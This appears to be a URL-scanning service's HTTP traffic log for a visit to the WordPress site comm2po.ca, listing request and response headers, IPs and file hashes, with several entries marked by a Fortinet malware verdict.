r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash a26d0784548ecab22f417f3d689daf23
8893b79366bbadeb5c8d587b8f023e310694df1c
35baaae7b3ce3110ebb2b075881cfab55ecf3eab57d834283fd18ac691b41fa2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "35BAAAE7B3CE3110EBB2B075881CFAB55ECF3EAB57D834283FD18AC691B41FA2"
Last-Modified: Tue, 20 Sep 2022 18:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11729
Expires: Wed, 21 Sep 2022 07:39:06 GMT
Date: Wed, 21 Sep 2022 04:23:37 GMT
Connection: keep-alive
firefox.settings.services.mozilla.com/v1/
143.204.55.35 200 OK 939 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/
IP 143.204.55.35:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 1b3053fa528e28810f8a2cc9284cc921
cca9eb471d941881a6b9a1793aecb6c281908f6a
a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Retry-After, Content-Type, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 21 Sep 2022 04:13:32 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 185768229530368be94556dcab1c486a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: IecxWSprdofPfS9y_EvskronEk0clIuWCDOYJRWz_k2clhhiWzhSjw==
Age: 605
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
143.204.55.35 200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
IP 143.204.55.35:0
File type PEM certificate\012- , ASCII text
Hash 6113f8408c59aebe188d6af273b90743
7398873bf00f99944eaa77ad3ebc0d43c23dba6b
b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: binary/octet-stream
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 20 Sep 2022 04:35:14 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: Tf-10HOI2HvQ_lKWiOAMBynH4PCfPWMGHZQSr71rDzs8ybiMOZgXyA==
age: 85704
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239 200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Wed, 21 Sep 2022 04:23:37 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
143.204.55.35 200 OK 329 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 143.204.55.35:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600
Date: Wed, 21 Sep 2022 04:03:22 GMT
Expires: Wed, 21 Sep 2022 04:37:30 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: k2pDrOZn-ZkYrahPBolrC1weK4oMwtweNQuTsNpXMVfz_yvBSJZRIg==
Age: 1215
comm2po.ca/
72.167.59.18 301 Moved Permanently 0 B IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Date: Wed, 21 Sep 2022 04:23:37 GMT
Server: Apache
X-Powered-By: PHP/7.4.30
Vary: Accept-Encoding,Cookie
X-Redirect-By: WordPress
Set-Cookie: _icl_current_language=fr; expires=Thu, 22-Sep-2022 04:23:37 GMT; Max-Age=86400; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: https://comm2po.ca/
Content-Length: 0
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash edf07cd621f733b0eb50c632387ebf4f
61a082d26501c2c8d481b1676d0de2e585269613
e5c4324e4c55824b86f48bf0b9a1d317a82e7d3c19bdea7a91d78ce98d68a980
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 959
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:37 GMT
Last-Modified: Wed, 21 Sep 2022 04:07:38 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 471
push.services.mozilla.com/
52.38.227.80 101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 52.38.227.80:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: kphLH02MCDfJJl3arQDS4w==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: J1ovU63wXZpmVRsreg2Zu327lzk=
comm2po.ca/
72.167.59.18 301 Moved Permanently 1 B IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash eccbc87e4b5ce2fe28308fd9f2a7baf3
77de68daecd823babbb58edb1c8e14d7106e83bb
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 301 Moved Permanently
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
x-redirect-by: WordPress
set-cookie: _icl_current_language=fr; expires=Thu, 22-Sep-2022 04:23:38 GMT; Max-Age=86400; path=/
location: https://www.comm2po.ca/
content-encoding: br
content-length: 1
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:38 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/
72.167.59.18 200 OK 16 kB IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (2443), with CRLF, LF line terminators
Hash 096038e982d9f97a374e8b9644a949b8
836cfe240fcfbe353ae94d8735cf137afad2c991
4ff8e20aaf22f643cfc6ebbb600067aac12fb59f0403be049de0ed03b24ab632
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
TE: trailers
HTTP/2 200 OK
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
cache-control: max-age=3, must-revalidate
content-encoding: br
content-length: 15842
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:38 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29 200 OK 278 B IP 93.184.220.29:0
Hash f938f3b4ff1af30191b7ff02c9e4c526
994116f14a8ddf45f8eabc147914dad7253f5ae0
323f9d9027f51c7e070a015e7c97bcdcc450a764ed52963749018f88f4413c7d
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4977
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Last-Modified: Wed, 21 Sep 2022 03:00:42 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 278
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash bcbb61a4f6f0beed45a5f963bfba6e9d
a07136aeace7036e3b7427d63c60576adbdc388f
3a910cde9f8f65341f3422d28e35ca877558e136c99067b72daaeb56b3d9e76d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash bcbb61a4f6f0beed45a5f963bfba6e9d
a07136aeace7036e3b7427d63c60576adbdc388f
3a910cde9f8f65341f3422d28e35ca877558e136c99067b72daaeb56b3d9e76d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js
23.36.79.43 302 Found 0 B URL HTTP/2 img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js
IP 23.36.79.43:0
ASN #20940 Akamai International B.V.
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /tcc/tcc_l.combined.1.0.6.min.js HTTP/1.1
Host: img1.wsimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 302 Found
content-length: 0
location: https://img1.wsimg.com/traffic-assets/js/tccl.min.js
cache-control: max-age=1800
expires: Wed, 21 Sep 2022 04:53:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2
img1.wsimg.com/traffic-assets/js/tccl.min.js
23.36.79.43 302 Found 0 B URL HTTP/2 img1.wsimg.com/traffic-assets/js/tccl.min.js
IP 23.36.79.43:0
ASN #20940 Akamai International B.V.
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /traffic-assets/js/tccl.min.js HTTP/1.1
Host: img1.wsimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.comm2po.ca/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 302 Found
content-length: 0
location: https://img6.wsimg.com/wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js
cache-control: max-age=1800
expires: Wed, 21 Sep 2022 04:53:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash e5d7d983b288c67e17280c6a1c0d80d9
8a1e575f8b8427e872c1e4c5645d9ce3e5445e52
a08530049c460e7e3cf236a9969b94b4a794d83f3f4279ac43934194f39dedd6
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
img6.wsimg.com/wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js
23.36.79.43 200 OK 11 kB URL HTTP/2 img6.wsimg.com/wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js
IP 23.36.79.43:0
ASN #20940 Akamai International B.V.
File type ASCII text, with very long lines (45500)
Hash 1ac00b5d5abfa64175a140de3f29a8e2
c07c5611cfff3ec4c7034134e4148f177242908c
65198366099c4eea2ed8a4dbe30fbb7896435a3505c5265260715d3385058378
GET /wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js HTTP/1.1
Host: img6.wsimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.comm2po.ca/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/javascript
accept-ranges: bytes
content-encoding: br
etag: "362d20193a8fed115f99b16a157b7fc4"
last-modified: Mon, 11 Apr 2022 14:15:53 GMT
vary: Accept-Encoding
x-edgeconnect-midmile-rtt: 15
x-edgeconnect-origin-mex-latency: 135
x-amz-id-2: 73c+ZpWNgBh9xtilh6Nj22iH/BmUfkHwAgj9PgWHmvdTmSCUhi96da6Ell5SKHaif06RANK80zY=
x-amz-request-id: N5JSXGJTVEFZM8E9
x-amz-server-side-encryption: AES256
x-amz-version-id: Z0H0F1CdjRUI_nRMydHHi17Rv0HOw5tB
content-length: 11155
cache-control: max-age=31536000
date: Wed, 21 Sep 2022 04:23:39 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.9.7
72.167.59.18 200 OK 1.3 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 88d24b7db52fe745f3e54b28188e662f
1f1d2a72d0212b22827c3b189bf36bb44a8f8f79
bd583f7a953312e9fe96d618ed3b7f69a524e971c82474f329b81e06e4b7b305
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:57 GMT
etag: "1561595-1750-51d8b6fce3d40-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1340
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/leadfox/css/leadfox.css?ver=5.4.2
72.167.59.18 200 OK 136 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/leadfox/css/leadfox.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash b339dfc48aca947f810f1b2faadad114
162e83a6d56eef2b010716ffd1807285499682f7
8838b6bb8b5e161f2d11a86bc83f57627631baad4a47f9c3f862c10837fedb6a
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/leadfox/css/leadfox.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jul 2020 00:57:26 GMT
etag: "156060c-14d-5a9cf798a8980-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 136
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector-click.css?ver=5.4.2
72.167.59.18 200 OK 826 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector-click.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 04fb9326f4d76d88bf1fd8b3ca320d91
999e88cd19549dd2c04695a264da6ae2a04c21c8
986351d47a114346a48daea70af24f7df4cfd49a07faf59efe01e6815643dc9e
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector-click.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:57 GMT
etag: "1561594-9d3-51d8b6fce3d40-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 826
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.1
72.167.59.18 200 OK 620 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 9f99d02cd2ebab69c2ddb8aa94ad8088
38d7a42447667ea805a063cc3012cd34b9a975d4
456d79e339948bd957d7e8d6cf2ca4ac9fda277dfbfa13093a0502322e595c08
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 06 Aug 2020 07:04:43 GMT
etag: "15410fd-780-5ac301a49b8c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 620
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash bcbb61a4f6f0beed45a5f963bfba6e9d
a07136aeace7036e3b7427d63c60576adbdc388f
3a910cde9f8f65341f3422d28e35ca877558e136c99067b72daaeb56b3d9e76d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
maps.googleapis.com/maps/api/js?key=AIzaSyAKFSA04UQVh2e56stH7y86PZy3i11fEzc&ver=5.4.2
142.250.74.170 200 OK 54 kB URL HTTP/2 maps.googleapis.com/maps/api/js?key=AIzaSyAKFSA04UQVh2e56stH7y86PZy3i11fEzc&ver=5.4.2
IP 142.250.74.170:0
File type ASCII text, with very long lines (2453)
Hash 6f70bbafdddfe5edd2de1dcefaac58ff
f6758d19ad2bb47077c4ac9e321ba28a6abd6195
26bf2348c2f8284b560f7f71eb91a7fc00288aab3775bf4c6d1e2983ab615f58
GET /maps/api/js?key=AIzaSyAKFSA04UQVh2e56stH7y86PZy3i11fEzc&ver=5.4.2 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:39 GMT
expires: Wed, 21 Sep 2022 04:53:39 GMT
cache-control: public, max-age=1800
vary: Accept-Language
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
content-encoding: gzip
server: mafe
content-length: 54039
x-xss-protection: 0
x-frame-options: SAMEORIGIN
server-timing: gfet4t7; dur=21
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.7
72.167.59.18 200 OK 154 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 4f6ebad13511e0f0de32aba27a2ffa5e
be1169f53e915018de86944389c4e67a07d262d9
ff808b64c5aae5e3a2e70a597f5bf67668493f68c61261a31e39e961acfe1651
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
